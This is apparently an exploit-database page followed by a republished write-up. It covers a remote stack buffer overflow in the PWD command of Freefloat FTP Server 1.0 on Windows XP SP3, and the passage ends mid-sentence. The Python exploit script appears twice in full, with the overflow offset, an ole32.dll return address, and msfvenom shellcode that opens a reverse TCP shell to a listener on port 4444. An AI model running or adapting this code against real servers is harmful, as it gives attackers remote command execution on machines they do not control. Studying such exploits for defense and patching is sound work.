Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow

Exploit Author: Waqas Ahmed Faroouqi Analysis Author: www.bubbleslearn.ir Category: Local Language: Python Published Date: 2023-09-04 
#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3 


#!/usr/bin/python

import socket

#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' 

#nc -lvp 4444
#Send exploit


#offset = 247 
#badchars=\x00\x0d\
#return_address=\x3b\x69\x5a\x77 (ole32.dll)

payload = (
"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
"\x19")

shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload

def main():
    ip = '192.168.146.135'
    port = 21

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    
    sock.recv(1024)
    sock.send('USER anonymous\r\n')
    sock.recv(1024)
    sock.send('PASS anonymous\r\n')
    sock.recv(1024)
    sock.send('pwd ' + shellcode + '\r\n')
    sock.close()
    
if __name__ == '__main__':
    main()


Freefloat FTP Server 1.0 'PWD' Remote Buffer Overflow: A Deep Dive into Exploitation and Mitigation

On August 22, 2023, a critical vulnerability was disclosed in the Freefloat FTP Server 1.0, specifically targeting the PWD (Print Working Directory) command. This flaw, identified by cybersecurity researcher Waqas Ahmed Faroouqi (ZEROXINN), enables remote attackers to execute arbitrary code via a buffer overflow exploit. The vulnerability affects systems running Windows XP SP3, a legacy operating system that remains in use in isolated environments, making this exploit particularly dangerous in outdated infrastructure.

Understanding the Vulnerability: Buffer Overflow in FTP Commands

Buffer overflow vulnerabilities occur when an application fails to properly validate input size, allowing attackers to overwrite adjacent memory regions. In this case, the PWD command in Freefloat FTP Server is susceptible to such an overflow due to improper handling of user-supplied input.

When a client sends a PWD command with a crafted payload, the server processes the input without bounds checking. This leads to a stack-based buffer overflow, where malicious data overwrites the return address on the stack, redirecting execution to attacker-controlled code.

Exploit Mechanics: Step-by-Step Breakdown

The exploit leverages the following components:

  • Target Server: Freefloat FTP Server 1.0, running on Windows XP SP3.
  • Exploit Command: PWD — a standard FTP command used to retrieve the current directory.
  • Attack Vector: Sending a specially crafted PWD request with a long payload.
  • Shellcode: A binary payload designed to open a reverse shell.
  • Return Address: \x3b\x69\x5a\x77, a known address in ole32.dll, which is a common target in Windows XP due to its widespread presence and predictable behavior.

Exploit Code Analysis


#!/usr/bin/python

import socket

# Metasploit Shellcode
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'

payload = (
"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
"\x19")

shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload

def main():
    ip = '192.168.146.135'
    port = 21

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((ip, port))
    
    sock.recv(1024)
    sock.send('USER anonymous\r\n')
    sock.recv(1024)
    sock.send('PASS anonymous\r\n')
    sock.recv(1024)
    sock.send('pwd ' + shellcode + '\r\n')
    sock.close()

if __name__ == '__main__':
    main()

This Python script demonstrates a remote exploitation of the Freefloat FTP Server. The code performs the following steps:

  • Establishes a TCP connection to the FTP server on port 21.
  • Authenticates using anonymous credentials (standard for FTP servers).
  • Sends a PWD command with a payload that includes:
    • 247 bytes of 'A' characters — used to fill the buffer up to the overflow point.
    • Return address \x3b\x69\x5a\x77 — pointing to a function in ole32.dll, which is a common target due to its presence in Windows XP.
    • 10 NOP sleds (0x90) — increasing the chance of successful execution by creating a "safe" region for the shellcode to land.
    • Metasploit-generated shellcode — designed to establish a reverse TCP connection to 192.168.146.134:4444.

Once the server processes the malformed PWD command, the buffer overflow triggers, corrupting the stack and redirecting